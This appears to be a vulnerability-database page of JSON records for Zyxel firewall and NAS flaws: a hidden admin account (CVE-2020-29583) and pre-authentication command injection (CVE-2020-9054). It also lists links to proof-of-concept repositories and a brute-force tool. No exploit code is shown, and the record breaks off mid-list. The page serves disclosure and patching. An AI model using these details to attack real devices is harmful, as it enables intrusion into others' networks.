Search

Find a vulnerability

Search criteria

    21 vulnerabilities found for vpn100 by zyxel

    VAR-202012-0977

    Vulnerability from variot - Updated: 2025-11-18 15:34

    Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges. Zyxel USG A device contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0977",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall1100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg1900",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp700",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp800",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg40w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg310",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn1000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg60",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall310",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg40",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg2200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg20w-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg210",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg1100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg20-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 700",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg60w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg210",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg110",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg60",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg40w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg310",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg40",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20w-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg1100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg60w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "cve": "CVE-2020-29583",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-29583",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-29583",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2020-29583",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-29583",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
                "id": "CVE-2020-29583",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-29583",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202012-1459",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-29583",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges. Zyxel USG A device contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-29583"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-29583",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-29583",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "id": "VAR-202012-0977",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3888889
      },
      "last_update_date": "2025-11-18T15:34:38Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Security\u00a0Advisories",
            "trust": 0.8,
            "url": "http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf"
          },
          {
            "title": "Zyxel USG Series Fixes for encryption problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=137990"
          },
          {
            "title": "BruteX-master\nBruteX\nInstall script for BruteX\n\nVARS\nBruteX by @xer0dayz\nhttp://xerosecurity.com\n\nABOUT:\nBruteX is a simple bash script used to brute force all services on a target.\n\nINSTALL:\n./install.sh\n\nUSAGE:\nbrutex \u003cIP/hostname\u003e \n\nHYDRA SERVICES:\nasterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp\nUN-COMMENT TO ENABLE PROXY",
            "trust": 0.1,
            "url": "https://github.com/MartinDojcinoski23/BruteX-master "
          },
          {
            "title": "Scanner for Zyxel products which are vulnerable due to an undocumented user account (CVE-2020-29583)\nUsage",
            "trust": 0.1,
            "url": "https://github.com/2d4d/scan_CVE-2020-29583 "
          },
          {
            "title": "Middleware-Vulnerability-detection\n\u514d\u8d23\u58f0\u660e\uff1a",
            "trust": 0.1,
            "url": "https://github.com/lovechinacoco/https-github.com-mai-lang-chai-Middleware-Vulnerability-detection "
          },
          {
            "title": "Middleware-Vulnerability-detection\n\u514d\u8d23\u58f0\u660e\uff1a",
            "trust": 0.1,
            "url": "https://github.com/apachecn-archive/Middleware-Vulnerability-detection "
          },
          {
            "title": "Awesome-POC",
            "trust": 0.1,
            "url": "https://github.com/ArrestX/--POC "
          },
          {
            "title": "Normal-POC",
            "trust": 0.1,
            "url": "https://github.com/Miraitowa70/POC-Notes "
          },
          {
            "title": "Vulnerability",
            "trust": 0.1,
            "url": "https://github.com/tzwlhack/Vulnerability "
          },
          {
            "title": "Normal-POC",
            "trust": 0.1,
            "url": "https://github.com/Miraitowa70/Pentest-Notes "
          },
          {
            "title": "Awesome-POC",
            "trust": 0.1,
            "url": "https://github.com/Threekiii/Awesome-POC "
          },
          {
            "title": "Awesome-POC",
            "trust": 0.1,
            "url": "https://github.com/KayCHENvip/vulnerability-poc "
          },
          {
            "title": "\u6b22\u8fce\u5173\u6ce8\u963f\u5c14\u6cd5\u5b9e\u9a8c\u5ba4\u5fae\u4fe1\u516c\u4f17\u53f7",
            "trust": 0.1,
            "url": "https://github.com/alphaSeclab/sec-daily-2020 "
          },
          {
            "title": "SecBooks\nSecBooks\u76ee\u5f55",
            "trust": 0.1,
            "url": "https://github.com/SexyBeast233/SecBooks "
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "PoC in GitHub",
            "trust": 0.1,
            "url": "https://github.com/developer3000S/PoC-in-GitHub "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/cybercriminals-exploits-zyxel-flaw/162789/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-522",
            "trust": 1.0
          },
          {
            "problemtype": "Plaintext storage of important information (CWE-312) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://www.zyxel.com/support/security_advisories.shtml"
          },
          {
            "trust": 1.7,
            "url": "https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15"
          },
          {
            "trust": 1.7,
            "url": "https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release"
          },
          {
            "trust": 1.7,
            "url": "https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.zyxel.com/support/cve-2020-29583.shtml"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29583"
          },
          {
            "trust": 1.1,
            "url": "https://www.secpod.com/blog/a-secret-zyxel-firewall-and-ap-controllers-could-allow-for-administrative-access-cve-2020-29583/"
          },
          {
            "trust": 1.1,
            "url": "http://ftp.zyxel.com/usg40/firmware/usg40_4.60%28aala.1%29c0_2.pdf"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-29583"
          },
          {
            "trust": 0.6,
            "url": "http://ftp.zyxel.com/usg40/firmware/usg40_4.60(aala.1)c0_2.pdf"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/522.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/martindojcinoski23/brutex-master"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-12-22T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "date": "2020-12-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "date": "2021-08-30T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "date": "2020-12-22T22:15:14.443000",
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-29583"
          },
          {
            "date": "2022-07-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          },
          {
            "date": "2021-08-30T08:31:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          },
          {
            "date": "2025-11-07T22:03:10.220000",
            "db": "NVD",
            "id": "CVE-2020-29583"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zyxel\u00a0USG\u00a0 Vulnerability in plaintext storage of important information on devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-014757"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "encryption problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202012-1459"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1707

    Vulnerability from variot - Updated: 2025-11-18 15:22

    Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2. plural ZyXEL Included in the product weblogin.cgi Is vulnerable to the execution of arbitrary commands. OS Command injection (CWE-78) - CVE-2020-9054 ZyXEL In multiple products offered by CGI Executable file weblogin.cgi Authentication is done using. About this vulnerability ZyXEL Made NAS Exploit codes for products are available on the Internet. Zyxel Technology is a provider of network broadband systems and solutions for internationally renowned brands. main

    Products include DSL central office and terminal equipment, router equipment, network security equipment, wireless local area communication equipment,

    It also provides full-range broadband network application integration solutions for Chinese enterprises, such as network telephones and Ethernet switches.

    Multiple ZyXEL network-attached storage (NAS) devices have security holes

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1707",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg2200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abiq.3\\)c0"
          },
          {
            "model": "usg2200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abae.3\\)c0"
          },
          {
            "model": "nas520",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21\\(aasz.3\\)c0"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg20w-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abar.3\\)c0"
          },
          {
            "model": "zywall110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abfv.3\\)c0"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg40",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aala.3\\)c0"
          },
          {
            "model": "usg110",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aaph.3\\)c0"
          },
          {
            "model": "usg110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg40w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aalb.3\\)c0"
          },
          {
            "model": "usg310",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aapj.3\\)c0"
          },
          {
            "model": "usg60w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aakz.3\\)c0"
          },
          {
            "model": "usg40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg1100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aapk.3\\)c0"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abip.3\\)c0"
          },
          {
            "model": "nas326",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21\\(aazf.7\\)c0"
          },
          {
            "model": "nas542",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21\\(abag.4\\)c0"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg210",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abfw.3\\)c0"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "zywall1100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aaac.3\\)c0"
          },
          {
            "model": "usg1900",
            "scope": "lt",
